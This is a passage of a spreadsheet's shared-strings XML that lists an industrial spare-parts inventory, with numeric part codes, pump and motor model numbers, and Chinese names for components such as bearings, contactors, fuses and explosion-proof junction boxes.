  <si>
    <t>01060732</t>
  </si>
  <si>
    <t>50-32-250</t>
  </si>
  <si>
    <t>01060733</t>
  </si>
  <si>
    <t>01060734</t>
  </si>
  <si>
    <t>TLS</t>
  </si>
  <si>
    <t>01060735</t>
  </si>
  <si>
    <t>YL100-80-15</t>
  </si>
  <si>
    <t>100-80-15 汽</t>
  </si>
  <si>
    <t>01060736</t>
  </si>
  <si>
    <t>YG100-80-160</t>
  </si>
  <si>
    <t>100-80-125【160】</t>
  </si>
  <si>
    <t>01060737</t>
  </si>
  <si>
    <t>ZT100-80-160</t>
  </si>
  <si>
    <t>100-80-125【160】素</t>
  </si>
  <si>
    <t>01060738</t>
  </si>
  <si>
    <t>Z100-80-160</t>
  </si>
  <si>
    <t>100-80-15  汽</t>
  </si>
  <si>
    <t>01060740</t>
  </si>
  <si>
    <t>01060747</t>
  </si>
  <si>
    <t>轴承支架</t>
  </si>
  <si>
    <t>250S-65A</t>
  </si>
  <si>
    <t>01060750</t>
  </si>
  <si>
    <t>SM250S-65A</t>
  </si>
  <si>
    <t>01060752</t>
  </si>
  <si>
    <t>MFH250S-65A</t>
  </si>
  <si>
    <t>01060758</t>
  </si>
  <si>
    <t>化 80/160A</t>
  </si>
  <si>
    <t>01060759</t>
  </si>
  <si>
    <t>100-100</t>
  </si>
  <si>
    <t>01060760</t>
  </si>
  <si>
    <t>01060763</t>
  </si>
  <si>
    <t>80-50-250【315】</t>
  </si>
  <si>
    <t>01060767</t>
  </si>
  <si>
    <t>Z80-50-250</t>
  </si>
  <si>
    <t>01060768</t>
  </si>
  <si>
    <t>YL80-50-250</t>
  </si>
  <si>
    <t>01060774</t>
  </si>
  <si>
    <t>SM100-65-200</t>
  </si>
  <si>
    <t>100-65-200</t>
  </si>
  <si>
    <t>01060775</t>
  </si>
  <si>
    <t>YL100-65-200</t>
  </si>
  <si>
    <t>01060778</t>
  </si>
  <si>
    <t>YL100-80-125</t>
  </si>
  <si>
    <t>65-160I</t>
  </si>
  <si>
    <t>01060780</t>
  </si>
  <si>
    <t>01060786</t>
  </si>
  <si>
    <t>YLFB-40</t>
  </si>
  <si>
    <t>65-40-200</t>
  </si>
  <si>
    <t>01060787</t>
  </si>
  <si>
    <t>SMFB-40</t>
  </si>
  <si>
    <t>01060788</t>
  </si>
  <si>
    <t>ZFB-40</t>
  </si>
  <si>
    <t>01060791</t>
  </si>
  <si>
    <t>Z50-32-200</t>
  </si>
  <si>
    <t>IS-50</t>
  </si>
  <si>
    <t>01060792</t>
  </si>
  <si>
    <t>SM50-32-200</t>
  </si>
  <si>
    <t>01060793</t>
  </si>
  <si>
    <t>YL50-32-200</t>
  </si>
  <si>
    <t>01060801</t>
  </si>
  <si>
    <t>Z150-125-250</t>
  </si>
  <si>
    <t>FB-40</t>
  </si>
  <si>
    <t>01060802</t>
  </si>
  <si>
    <t>YL150-125-250</t>
  </si>
  <si>
    <t>01060803</t>
  </si>
  <si>
    <t>ZT150-125-250</t>
  </si>
  <si>
    <t>01060804</t>
  </si>
  <si>
    <t>ZCZJ150-125-250</t>
  </si>
  <si>
    <t>01060805</t>
  </si>
  <si>
    <t>契型环</t>
  </si>
  <si>
    <t>01060806</t>
  </si>
  <si>
    <t>LZQ</t>
  </si>
  <si>
    <t>01060808</t>
  </si>
  <si>
    <t>SHS-45  尿</t>
  </si>
  <si>
    <t>01060810</t>
  </si>
  <si>
    <t>RZIB-F</t>
  </si>
  <si>
    <t>绕轴</t>
  </si>
  <si>
    <t>IB-F</t>
  </si>
  <si>
    <t>01060811</t>
  </si>
  <si>
    <t>Z200</t>
  </si>
  <si>
    <t>定子</t>
  </si>
  <si>
    <t>支</t>
  </si>
  <si>
    <t>01060814</t>
  </si>
  <si>
    <t>KB1101  汽</t>
  </si>
  <si>
    <t>未见实物</t>
  </si>
  <si>
    <t>01060816</t>
  </si>
  <si>
    <t>ZZ</t>
  </si>
  <si>
    <t>KQSN200-M12</t>
  </si>
  <si>
    <t>01060818</t>
  </si>
  <si>
    <t>CTKUSN200-M12</t>
  </si>
  <si>
    <t>衬套</t>
  </si>
  <si>
    <t>KUSN200-M12</t>
  </si>
  <si>
    <t>01060825</t>
  </si>
  <si>
    <t>轴承体</t>
  </si>
  <si>
    <t>01060826</t>
  </si>
  <si>
    <t>ZTKUSN300-M13</t>
  </si>
  <si>
    <t>KUSN300-M13</t>
  </si>
  <si>
    <t>01060827</t>
  </si>
  <si>
    <t>YLKUSN300-M13</t>
  </si>
  <si>
    <t>01060828</t>
  </si>
  <si>
    <t>DTKUSN300-M13</t>
  </si>
  <si>
    <t>挡套</t>
  </si>
  <si>
    <t>01060829</t>
  </si>
  <si>
    <t>MFHKUSN300-M13</t>
  </si>
  <si>
    <t>01060830</t>
  </si>
  <si>
    <t>KQSN300-M13</t>
  </si>
  <si>
    <t>01060831</t>
  </si>
  <si>
    <t>CTKUSN300-M13</t>
  </si>
  <si>
    <t>01060836</t>
  </si>
  <si>
    <t>YLKUSN350-M9</t>
  </si>
  <si>
    <t>KUSN350-M9</t>
  </si>
  <si>
    <t>01060837</t>
  </si>
  <si>
    <t>ZTKUSN350-M9</t>
  </si>
  <si>
    <t>KQSN350-M9</t>
  </si>
  <si>
    <t>01060838</t>
  </si>
  <si>
    <t>DTKUSN350-M9</t>
  </si>
  <si>
    <t>01060840</t>
  </si>
  <si>
    <t>01060843</t>
  </si>
  <si>
    <t>密封体</t>
  </si>
  <si>
    <t>KQSN300-M19</t>
  </si>
  <si>
    <t>01060845</t>
  </si>
  <si>
    <t>KQSN300-19</t>
  </si>
  <si>
    <t>01060846</t>
  </si>
  <si>
    <t>01060847</t>
  </si>
  <si>
    <t>01060848</t>
  </si>
  <si>
    <t>01060849</t>
  </si>
  <si>
    <t>01060853</t>
  </si>
  <si>
    <t>ZT85-80*7</t>
  </si>
  <si>
    <t>85-80*7</t>
  </si>
  <si>
    <t>01060854</t>
  </si>
  <si>
    <t>PHP85-80*7</t>
  </si>
  <si>
    <t>01060855</t>
  </si>
  <si>
    <t>DG85-80*7</t>
  </si>
  <si>
    <t>01060856</t>
  </si>
  <si>
    <t>中段</t>
  </si>
  <si>
    <t>01060857</t>
  </si>
  <si>
    <t>O型圈</t>
  </si>
  <si>
    <t>01060858</t>
  </si>
  <si>
    <t>Z85-80*7</t>
  </si>
  <si>
    <t>01060860</t>
  </si>
  <si>
    <t>DYT85-80*7</t>
  </si>
  <si>
    <t>导叶套</t>
  </si>
  <si>
    <t>01060862</t>
  </si>
  <si>
    <t>KQWH</t>
  </si>
  <si>
    <t>01060875</t>
  </si>
  <si>
    <t>KQWR40-200</t>
  </si>
  <si>
    <t>01060879</t>
  </si>
  <si>
    <t>托架体</t>
  </si>
  <si>
    <t>01060882</t>
  </si>
  <si>
    <t>01060883</t>
  </si>
  <si>
    <t>01060885</t>
  </si>
  <si>
    <t>浮动总成</t>
  </si>
  <si>
    <t>100R-37  化工循环水</t>
  </si>
  <si>
    <t>01060888</t>
  </si>
  <si>
    <t>01060889</t>
  </si>
  <si>
    <t>YL100R-37</t>
  </si>
  <si>
    <t>01060902</t>
  </si>
  <si>
    <t>YG2-1/2GC-3.5*8</t>
  </si>
  <si>
    <t>拼帽</t>
  </si>
  <si>
    <t>01060903</t>
  </si>
  <si>
    <t>PHP2-1/2GC-3.5*8</t>
  </si>
  <si>
    <t>泵壳</t>
  </si>
  <si>
    <t>01060904</t>
  </si>
  <si>
    <t>ZT2-1/2GC-3.5*8</t>
  </si>
  <si>
    <t>01060905</t>
  </si>
  <si>
    <t>PHH2-1/2GC-3.5*8</t>
  </si>
  <si>
    <t>密封盒</t>
  </si>
  <si>
    <t>01060907</t>
  </si>
  <si>
    <t>01060908</t>
  </si>
  <si>
    <t>BGUHB-15</t>
  </si>
  <si>
    <t>01060909</t>
  </si>
  <si>
    <t>01060913</t>
  </si>
  <si>
    <t>01060914</t>
  </si>
  <si>
    <t>01060915</t>
  </si>
  <si>
    <t>100UHB</t>
  </si>
  <si>
    <t>01060917</t>
  </si>
  <si>
    <t>K型圈</t>
  </si>
  <si>
    <t>01060933</t>
  </si>
  <si>
    <t>YL250QJ</t>
  </si>
  <si>
    <t>250QJ</t>
  </si>
  <si>
    <t>01060935</t>
  </si>
  <si>
    <t>Z250QJ</t>
  </si>
  <si>
    <t>01060936</t>
  </si>
  <si>
    <t>XJZC250QJ</t>
  </si>
  <si>
    <t>橡胶轴承</t>
  </si>
  <si>
    <t>01060945</t>
  </si>
  <si>
    <t>轴承室</t>
  </si>
  <si>
    <t>01060947</t>
  </si>
  <si>
    <t>DG25-30*9</t>
  </si>
  <si>
    <t>01060950</t>
  </si>
  <si>
    <t>ZTDG25-30*9</t>
  </si>
  <si>
    <t>01060951</t>
  </si>
  <si>
    <t>LZQDG25-30*9</t>
  </si>
  <si>
    <t>01060955</t>
  </si>
  <si>
    <t>YLUHB-12</t>
  </si>
  <si>
    <t>32UHB-12</t>
  </si>
  <si>
    <t>01060956</t>
  </si>
  <si>
    <t>Z32UHB-12</t>
  </si>
  <si>
    <t>01060960</t>
  </si>
  <si>
    <t>KXQ32UHB-12</t>
  </si>
  <si>
    <t>01060967</t>
  </si>
  <si>
    <t>50UHB</t>
  </si>
  <si>
    <t>01060968</t>
  </si>
  <si>
    <t>01060970</t>
  </si>
  <si>
    <t>01060972</t>
  </si>
  <si>
    <t>01060973</t>
  </si>
  <si>
    <t>01060974</t>
  </si>
  <si>
    <t>01060978</t>
  </si>
  <si>
    <t>01061321</t>
  </si>
  <si>
    <t>KQL125/90-75</t>
  </si>
  <si>
    <t>01061350</t>
  </si>
  <si>
    <t>500-12</t>
  </si>
  <si>
    <t>01061353</t>
  </si>
  <si>
    <t>卡簧</t>
  </si>
  <si>
    <t>01061354</t>
  </si>
  <si>
    <t>01061355</t>
  </si>
  <si>
    <t>01061420</t>
  </si>
  <si>
    <t>200UHB-350</t>
  </si>
  <si>
    <t>01061423</t>
  </si>
  <si>
    <t>01061427</t>
  </si>
  <si>
    <t>01061440</t>
  </si>
  <si>
    <t>拼圈</t>
  </si>
  <si>
    <t>40YU-20</t>
  </si>
  <si>
    <t>01061441</t>
  </si>
  <si>
    <t>01061442</t>
  </si>
  <si>
    <t>01061443</t>
  </si>
  <si>
    <t>01061444</t>
  </si>
  <si>
    <t>01061445</t>
  </si>
  <si>
    <t>01071002</t>
  </si>
  <si>
    <t>ZG3504047</t>
  </si>
  <si>
    <t>针杆</t>
  </si>
  <si>
    <t>3504047</t>
  </si>
  <si>
    <t>01071013</t>
  </si>
  <si>
    <t>SLT</t>
  </si>
  <si>
    <t>三联体</t>
  </si>
  <si>
    <t>01071014</t>
  </si>
  <si>
    <t>SFZC</t>
  </si>
  <si>
    <t>四氟轴承</t>
  </si>
  <si>
    <t>01071051-1</t>
  </si>
  <si>
    <t>汽缸</t>
  </si>
  <si>
    <t>SC50</t>
  </si>
  <si>
    <t>01071051-2</t>
  </si>
  <si>
    <t>SC40</t>
  </si>
  <si>
    <t>01071056</t>
  </si>
  <si>
    <t>7-4</t>
  </si>
  <si>
    <t>01071057</t>
  </si>
  <si>
    <t>摇臂</t>
  </si>
  <si>
    <t>01071075</t>
  </si>
  <si>
    <t>钩针</t>
  </si>
  <si>
    <t>缝包机</t>
  </si>
  <si>
    <t>01071103</t>
  </si>
  <si>
    <t>DCFDZ200M-3F</t>
  </si>
  <si>
    <t>200M-3F</t>
  </si>
  <si>
    <t>01071116</t>
  </si>
  <si>
    <t>GZ9R19</t>
  </si>
  <si>
    <t>螺母</t>
  </si>
  <si>
    <t>01071125</t>
  </si>
  <si>
    <t>JXLD9S3</t>
  </si>
  <si>
    <t>夹线螺母</t>
  </si>
  <si>
    <t>GK9</t>
  </si>
  <si>
    <t>01071129</t>
  </si>
  <si>
    <t>lm</t>
  </si>
  <si>
    <t>螺钉</t>
  </si>
  <si>
    <t>01081201</t>
  </si>
  <si>
    <t>LGZ3W6B</t>
  </si>
  <si>
    <t>连杆组</t>
  </si>
  <si>
    <t>3W6B</t>
  </si>
  <si>
    <t>01081206</t>
  </si>
  <si>
    <t>ZCH3W6B</t>
  </si>
  <si>
    <t>01081207</t>
  </si>
  <si>
    <t>SZTT3W6B</t>
  </si>
  <si>
    <t>十字头体</t>
  </si>
  <si>
    <t>01081208</t>
  </si>
  <si>
    <t>TZD3W6B</t>
  </si>
  <si>
    <t>调整垫</t>
  </si>
  <si>
    <t>01081211</t>
  </si>
  <si>
    <t>LGW3W6B</t>
  </si>
  <si>
    <t>球面垫</t>
  </si>
  <si>
    <t>01081223</t>
  </si>
  <si>
    <t>QMD3W6B</t>
  </si>
  <si>
    <t>01081228</t>
  </si>
  <si>
    <t>排液片</t>
  </si>
  <si>
    <t>3-03-2</t>
  </si>
  <si>
    <t>片</t>
  </si>
  <si>
    <t>01081233</t>
  </si>
  <si>
    <t>ZJT3-4</t>
  </si>
  <si>
    <t>中间套</t>
  </si>
  <si>
    <t>3-4</t>
  </si>
  <si>
    <t>01081235</t>
  </si>
  <si>
    <t>JYFX3-02-1</t>
  </si>
  <si>
    <t>进液阀芯</t>
  </si>
  <si>
    <t>3-02-1</t>
  </si>
  <si>
    <t>01081236</t>
  </si>
  <si>
    <t>JYFFZ3-02-2</t>
  </si>
  <si>
    <t>进液阀座</t>
  </si>
  <si>
    <t>3-02-2</t>
  </si>
  <si>
    <t>01081238</t>
  </si>
  <si>
    <t>TH67/150</t>
  </si>
  <si>
    <t>弹簧</t>
  </si>
  <si>
    <t>01081240</t>
  </si>
  <si>
    <t>GZ1-1/4</t>
  </si>
  <si>
    <t>钢珠</t>
  </si>
  <si>
    <t>1-1/4</t>
  </si>
  <si>
    <t>01081244</t>
  </si>
  <si>
    <t>1-29</t>
  </si>
  <si>
    <t>01081245</t>
  </si>
  <si>
    <t>1-4-5</t>
  </si>
  <si>
    <t>01081247</t>
  </si>
  <si>
    <t>阀片</t>
  </si>
  <si>
    <t>67-150</t>
  </si>
  <si>
    <t>01081248</t>
  </si>
  <si>
    <t>密封函体</t>
  </si>
  <si>
    <t>3-01-4</t>
  </si>
  <si>
    <t>01081249</t>
  </si>
  <si>
    <t>调节螺母</t>
  </si>
  <si>
    <t>3-01-2</t>
  </si>
  <si>
    <t>01081251-1</t>
  </si>
  <si>
    <t>部分球面垫</t>
  </si>
  <si>
    <t>1-8</t>
  </si>
  <si>
    <t>01091326</t>
  </si>
  <si>
    <t>CYWT273*8</t>
  </si>
  <si>
    <t>弯头</t>
  </si>
  <si>
    <t>273*8</t>
  </si>
  <si>
    <t>01091332</t>
  </si>
  <si>
    <t>CYWT530*8</t>
  </si>
  <si>
    <t>530*8</t>
  </si>
  <si>
    <t>01091333</t>
  </si>
  <si>
    <t>CYWT630*10</t>
  </si>
  <si>
    <t>630*10</t>
  </si>
  <si>
    <t>01091339</t>
  </si>
  <si>
    <t>BSFLDG20</t>
  </si>
  <si>
    <t>板式法兰</t>
  </si>
  <si>
    <t>DG15-20</t>
  </si>
  <si>
    <t>01091347</t>
  </si>
  <si>
    <t>BSFLDG600</t>
  </si>
  <si>
    <t>DG600</t>
  </si>
  <si>
    <t>01091348</t>
  </si>
  <si>
    <t>HTFLDG300</t>
  </si>
  <si>
    <t>活套法兰</t>
  </si>
  <si>
    <t>DG300</t>
  </si>
  <si>
    <t>02010101-1</t>
  </si>
  <si>
    <t>FBJXHZD</t>
  </si>
  <si>
    <t>防爆接线盒终端</t>
  </si>
  <si>
    <t>02010104</t>
  </si>
  <si>
    <t>BXG</t>
  </si>
  <si>
    <t>玻璃保险管</t>
  </si>
  <si>
    <t>5A  10A  3A</t>
  </si>
  <si>
    <t>02010105</t>
  </si>
  <si>
    <t>JXDZ</t>
  </si>
  <si>
    <t>接线端子</t>
  </si>
  <si>
    <t>UK-2.5B</t>
  </si>
  <si>
    <t>02010107</t>
  </si>
  <si>
    <t>行程开关</t>
  </si>
  <si>
    <t>02010110</t>
  </si>
  <si>
    <t>ANKG</t>
  </si>
  <si>
    <t>按钮开关</t>
  </si>
  <si>
    <t>02010110-1</t>
  </si>
  <si>
    <t>船型开关</t>
  </si>
  <si>
    <t>02010110-2</t>
  </si>
  <si>
    <t>拨码开关</t>
  </si>
  <si>
    <t>02010110-3</t>
  </si>
  <si>
    <t>开关配件</t>
  </si>
  <si>
    <t>02010110-6</t>
  </si>
  <si>
    <t>电缆开关</t>
  </si>
  <si>
    <t>02010115</t>
  </si>
  <si>
    <t>FBAN</t>
  </si>
  <si>
    <t>防爆按钮</t>
  </si>
  <si>
    <t>02010123</t>
  </si>
  <si>
    <t>JDTDD</t>
  </si>
  <si>
    <t>静电托地带</t>
  </si>
  <si>
    <t>02010130-6</t>
  </si>
  <si>
    <t>高静压差压变送器</t>
  </si>
  <si>
    <t>0-250</t>
  </si>
  <si>
    <t>02010135</t>
  </si>
  <si>
    <t>XHD</t>
  </si>
  <si>
    <t>信号灯</t>
  </si>
  <si>
    <t>02010136</t>
  </si>
  <si>
    <t>WNZHKGLW5-16-3</t>
  </si>
  <si>
    <t>万能转换开关</t>
  </si>
  <si>
    <t>LW5-16-3</t>
  </si>
  <si>
    <t>02010150</t>
  </si>
  <si>
    <t>ZHKG</t>
  </si>
  <si>
    <t>组合开关</t>
  </si>
  <si>
    <t>HZ10-100/3</t>
  </si>
  <si>
    <t>02010151</t>
  </si>
  <si>
    <t>FBDJ</t>
  </si>
  <si>
    <t>防爆电机</t>
  </si>
  <si>
    <t>02010155-6</t>
  </si>
  <si>
    <t>0.4</t>
  </si>
  <si>
    <t>02010155-7</t>
  </si>
  <si>
    <t>02010156</t>
  </si>
  <si>
    <t>CSDJ</t>
  </si>
  <si>
    <t>测速电机</t>
  </si>
  <si>
    <t>02010159</t>
  </si>
  <si>
    <t>1.5KW</t>
  </si>
  <si>
    <t>02010160</t>
  </si>
  <si>
    <t>WDJ</t>
  </si>
  <si>
    <t>微电机</t>
  </si>
  <si>
    <t>XWC-300型</t>
  </si>
  <si>
    <t>02010162</t>
  </si>
  <si>
    <t>DGY165</t>
  </si>
  <si>
    <t>端盖</t>
  </si>
  <si>
    <t>Y165</t>
  </si>
  <si>
    <t>02010163</t>
  </si>
  <si>
    <t>DJDGY132</t>
  </si>
  <si>
    <t>电机端盖</t>
  </si>
  <si>
    <t>Y132</t>
  </si>
  <si>
    <t>02010168-1</t>
  </si>
  <si>
    <t>碳刷</t>
  </si>
  <si>
    <t>02010177</t>
  </si>
  <si>
    <t>PDX</t>
  </si>
  <si>
    <t>PZ30-18 明</t>
  </si>
  <si>
    <t>02010178</t>
  </si>
  <si>
    <t>控制器</t>
  </si>
  <si>
    <t>02010183</t>
  </si>
  <si>
    <t>DG</t>
  </si>
  <si>
    <t>Y280</t>
  </si>
  <si>
    <t>02010184</t>
  </si>
  <si>
    <t>DJBHQ</t>
  </si>
  <si>
    <t>电机保护器</t>
  </si>
  <si>
    <t>JD5-80A</t>
  </si>
  <si>
    <t>02010188-3</t>
  </si>
  <si>
    <t>接触器</t>
  </si>
  <si>
    <t>20/250/380</t>
  </si>
  <si>
    <t>02010190</t>
  </si>
  <si>
    <t>DL</t>
  </si>
  <si>
    <t>电铃</t>
  </si>
  <si>
    <t>6寸</t>
  </si>
  <si>
    <t>02010196</t>
  </si>
  <si>
    <t>DKG</t>
  </si>
  <si>
    <t>刀开关</t>
  </si>
  <si>
    <t>02010198</t>
  </si>
  <si>
    <t>DJQDG</t>
  </si>
  <si>
    <t>Y160-2</t>
  </si>
  <si>
    <t>02010202-1</t>
  </si>
  <si>
    <t>开关</t>
  </si>
  <si>
    <t>02010206</t>
  </si>
  <si>
    <t>LBD</t>
  </si>
  <si>
    <t>铝包带</t>
  </si>
  <si>
    <t>公斤</t>
  </si>
  <si>
    <t>02010207</t>
  </si>
  <si>
    <t>插头</t>
  </si>
  <si>
    <t>02010208</t>
  </si>
  <si>
    <t>BXX</t>
  </si>
  <si>
    <t>保险芯</t>
  </si>
  <si>
    <t>02010210</t>
  </si>
  <si>
    <t>RDQ</t>
  </si>
  <si>
    <t>熔断器</t>
  </si>
  <si>
    <t>RT14-10A</t>
  </si>
  <si>
    <t>02010229</t>
  </si>
  <si>
    <t>FBD</t>
  </si>
  <si>
    <t>防爆灯</t>
  </si>
  <si>
    <t>BAD53-100型</t>
  </si>
  <si>
    <t>02010242-3</t>
  </si>
  <si>
    <t>刹车风叶</t>
  </si>
  <si>
    <t>4.5</t>
  </si>
  <si>
    <t>02010242-4</t>
  </si>
  <si>
    <t>电机风叶</t>
  </si>
  <si>
    <t>250-4</t>
  </si>
  <si>
    <t>02010242-5</t>
  </si>
  <si>
    <t>225-4</t>
  </si>
  <si>
    <t>02010255</t>
  </si>
  <si>
    <t>JYGB</t>
  </si>
  <si>
    <t>绝缘隔板</t>
  </si>
  <si>
    <t>02010259</t>
  </si>
  <si>
    <t>HLG</t>
  </si>
  <si>
    <t>黄腊管</t>
  </si>
  <si>
    <t>2mm</t>
  </si>
  <si>
    <t>02010264</t>
  </si>
  <si>
    <t>02010268</t>
  </si>
  <si>
    <t>JXB</t>
  </si>
  <si>
    <t>接线板</t>
  </si>
  <si>
    <t>02010272</t>
  </si>
  <si>
    <t>CDK300W</t>
  </si>
  <si>
    <t>灯口</t>
  </si>
  <si>
    <t>02010273</t>
  </si>
  <si>
    <t>DWDG</t>
  </si>
  <si>
    <t>碘钨灯管</t>
  </si>
  <si>
    <t>1000W</t>
  </si>
  <si>
    <t>02010276</t>
  </si>
  <si>
    <t>DP</t>
  </si>
  <si>
    <t>灯泡</t>
  </si>
  <si>
    <t>36V</t>
  </si>
  <si>
    <t>02010283</t>
  </si>
  <si>
    <t>WD</t>
  </si>
  <si>
    <t>弯灯</t>
  </si>
  <si>
    <t>02010291</t>
  </si>
  <si>
    <t>JCQ</t>
  </si>
  <si>
    <t>CJX2-2501</t>
  </si>
  <si>
    <t>02010292</t>
  </si>
  <si>
    <t>CJX2-2501 36V</t>
  </si>
  <si>
    <t>02010294</t>
  </si>
  <si>
    <t>hgq</t>
  </si>
  <si>
    <t>互感器</t>
  </si>
  <si>
    <t>LMZ1-50/5</t>
  </si>
  <si>
    <t>02010297</t>
  </si>
  <si>
    <t>ZSAN</t>
  </si>
  <si>
    <t>置数按钮</t>
  </si>
  <si>
    <t>02010298-1</t>
  </si>
  <si>
    <t>高压油封</t>
  </si>
  <si>
    <t>02010301</t>
  </si>
  <si>
    <t>DLB</t>
  </si>
  <si>
    <t>电流表</t>
  </si>
  <si>
    <t>42L6</t>
  </si>
  <si>
    <t>02010302</t>
  </si>
  <si>
    <t>DYB</t>
  </si>
  <si>
    <t>电压表</t>
  </si>
  <si>
    <t>02010303-3</t>
  </si>
  <si>
    <t>6L2</t>
  </si>
  <si>
    <t>02010303-4</t>
  </si>
  <si>
    <t>电压电流表</t>
  </si>
  <si>
    <t>02010303-5</t>
  </si>
  <si>
    <t>02010303-6</t>
  </si>
  <si>
    <t>42L6-600/5</t>
  </si>
  <si>
    <t>02010304</t>
  </si>
  <si>
    <t>FZXQ</t>
  </si>
  <si>
    <t>分闸线圈</t>
  </si>
  <si>
    <t>02010306-1</t>
  </si>
  <si>
    <t>02010307</t>
  </si>
  <si>
    <t>0.75KW</t>
  </si>
  <si>
    <t>02010307-1</t>
  </si>
  <si>
    <t>0.25KW</t>
  </si>
  <si>
    <t>02010311</t>
  </si>
  <si>
    <t>DHX</t>
  </si>
  <si>
    <t>电话线</t>
  </si>
  <si>
    <t>02010317</t>
  </si>
  <si>
    <t>6L2-50/5</t>
  </si>
  <si>
    <t>02010320</t>
  </si>
  <si>
    <t>GLYSZHQ</t>
  </si>
  <si>
    <t>功率因数转换器</t>
  </si>
  <si>
    <t>02010321-2</t>
  </si>
  <si>
    <t>BYQ</t>
  </si>
  <si>
    <t>02010325-2</t>
  </si>
  <si>
    <t>TSXQ</t>
  </si>
  <si>
    <t>调速线圈</t>
  </si>
  <si>
    <t>YCT200</t>
  </si>
  <si>
    <t>02010329</t>
  </si>
  <si>
    <t>44L 1-450V</t>
  </si>
  <si>
    <t>02010331</t>
  </si>
  <si>
    <t>JDQDC24V</t>
  </si>
  <si>
    <t>微型继电器</t>
  </si>
  <si>
    <t>DC24V</t>
  </si>
  <si>
    <t>02010332-2</t>
  </si>
  <si>
    <t>电机轴承压盖</t>
  </si>
  <si>
    <t>Y160</t>
  </si>
  <si>
    <t>02010369</t>
  </si>
  <si>
    <t>fbljg</t>
  </si>
  <si>
    <t>防爆连接管</t>
  </si>
  <si>
    <t>02010391</t>
  </si>
  <si>
    <t>GJX</t>
  </si>
  <si>
    <t>钢绞线</t>
  </si>
  <si>
    <t>02010395</t>
  </si>
  <si>
    <t>pdx</t>
  </si>
  <si>
    <t>明装配电箱</t>
  </si>
  <si>
    <t>PZ 30-10</t>
  </si>
  <si>
    <t>02010407</t>
  </si>
  <si>
    <t>JCQCJ20-63A</t>
  </si>
  <si>
    <t>CJ20-63A/380V</t>
  </si>
  <si>
    <t>02010410</t>
  </si>
  <si>
    <t>CJ12-250A/380</t>
  </si>
  <si>
    <t>02010413-5</t>
  </si>
  <si>
    <t>抗晃电接触器</t>
  </si>
  <si>
    <t>02010414</t>
  </si>
  <si>
    <t>JCQ630A</t>
  </si>
  <si>
    <t>CJ20-630A/220V</t>
  </si>
  <si>
    <t>02010415-1</t>
  </si>
  <si>
    <t>kkbz</t>
  </si>
  <si>
    <t>开口鼻子</t>
  </si>
  <si>
    <t>02010416</t>
  </si>
  <si>
    <t>CJ20-40A/380V</t>
  </si>
  <si>
    <t>02010417</t>
  </si>
  <si>
    <t>CJ20-25A/380V</t>
  </si>
  <si>
    <t>02010418</t>
  </si>
  <si>
    <t>恒节流孔</t>
  </si>
  <si>
    <t>02010420</t>
  </si>
  <si>
    <t>zws</t>
  </si>
  <si>
    <t>钻尾丝</t>
  </si>
  <si>
    <t>02010420-2</t>
  </si>
  <si>
    <t>套头</t>
  </si>
  <si>
    <t>02010427</t>
  </si>
  <si>
    <t>HGQ200-5</t>
  </si>
  <si>
    <t>200-5</t>
  </si>
  <si>
    <t>02010433</t>
  </si>
  <si>
    <t>SRDQ355A</t>
  </si>
  <si>
    <t>速熔断器</t>
  </si>
  <si>
    <t>355A</t>
  </si>
  <si>
    <t>02010435</t>
  </si>
  <si>
    <t>rdq</t>
  </si>
  <si>
    <t>RTO-100</t>
  </si>
  <si>
    <t>02010453</t>
  </si>
  <si>
    <t>KQGLJYF</t>
  </si>
  <si>
    <t>空气过滤减压阀</t>
  </si>
  <si>
    <t>02010453-2</t>
  </si>
  <si>
    <t>减压阀油水分离器</t>
  </si>
  <si>
    <t>02010458</t>
  </si>
  <si>
    <t>DJFZ</t>
  </si>
  <si>
    <t>电机风罩</t>
  </si>
  <si>
    <t>Y112</t>
  </si>
  <si>
    <t>02010468</t>
  </si>
  <si>
    <t>RJDQ</t>
  </si>
  <si>
    <t>热继电器</t>
  </si>
  <si>
    <t>02010471</t>
  </si>
  <si>
    <t>继电器</t>
  </si>
  <si>
    <t>02010472</t>
  </si>
  <si>
    <t>ZJJDQ</t>
  </si>
  <si>
    <t>中间继电器</t>
  </si>
  <si>
    <t>JZ7-44</t>
  </si>
  <si>
    <t>02010473</t>
  </si>
  <si>
    <t>02010475</t>
  </si>
  <si>
    <t>JSQ</t>
  </si>
  <si>
    <t>计数器</t>
  </si>
  <si>
    <t>02010480</t>
  </si>
  <si>
    <t>HD13-1500/30  胶板</t>
  </si>
  <si>
    <t>02010481</t>
  </si>
  <si>
    <t>6L2-200/5</t>
  </si>
  <si>
    <t>02010483</t>
  </si>
  <si>
    <t>XQCJ10-20A</t>
  </si>
  <si>
    <t>线圈</t>
  </si>
  <si>
    <t>CJ10-20A</t>
  </si>
  <si>
    <t>02010484</t>
  </si>
  <si>
    <t>RT 0-200A</t>
  </si>
  <si>
    <t>02010484-1</t>
  </si>
  <si>
    <t>160A</t>
  </si>
  <si>
    <t>02010485-1</t>
  </si>
  <si>
    <t>42L</t>
  </si>
  <si>
    <t>02010486-1</t>
  </si>
  <si>
    <t>02010486-2</t>
  </si>
  <si>
    <t>合闸线圈</t>
  </si>
  <si>
    <t>CDC10-10</t>
  </si>
  <si>
    <t>02010486-3</t>
  </si>
  <si>
    <t>XQ205A</t>
  </si>
  <si>
    <t>250A</t>
  </si>
  <si>
    <t>02010505</t>
  </si>
  <si>
    <t>FBJXH</t>
  </si>
  <si>
    <t>防爆接线盒</t>
  </si>
  <si>
    <t>三通一吊</t>
  </si>
  <si>
    <t>02010506</t>
  </si>
  <si>
    <t>四通</t>
  </si>
  <si>
    <t>02010523-1</t>
  </si>
  <si>
    <t>150  FZY-D</t>
  </si>
  <si>
    <t>02010531</t>
  </si>
  <si>
    <t>JXZ</t>
  </si>
  <si>
    <t>电机接线柱</t>
  </si>
  <si>
    <t>02010534-2</t>
  </si>
  <si>
    <t>QTBZ</t>
  </si>
  <si>
    <t>全铜鼻子</t>
  </si>
  <si>
    <t>DT16</t>
  </si>
  <si>
    <t>02010535</t>
  </si>
  <si>
    <t>DT35</t>
  </si>
  <si>
    <t>02010535-1</t>
  </si>
  <si>
    <t>DT 50</t>
  </si>
  <si>
    <t>02010535-4</t>
  </si>
  <si>
    <t>DT 150</t>
  </si>
  <si>
    <t>02010535-5</t>
  </si>
  <si>
    <t>铜鼻子</t>
  </si>
  <si>
    <t>DT 25</t>
  </si>
  <si>
    <t>02010539-1</t>
  </si>
  <si>
    <t>铜铝线鼻子</t>
  </si>
  <si>
    <t>95</t>
  </si>
  <si>
    <t>02010540</t>
  </si>
  <si>
    <t>TLXBZ</t>
  </si>
  <si>
    <t>50#</t>
  </si>
  <si>
    <t>02010541</t>
  </si>
  <si>
    <t>10A</t>
  </si>
  <si>
    <t>02010543</t>
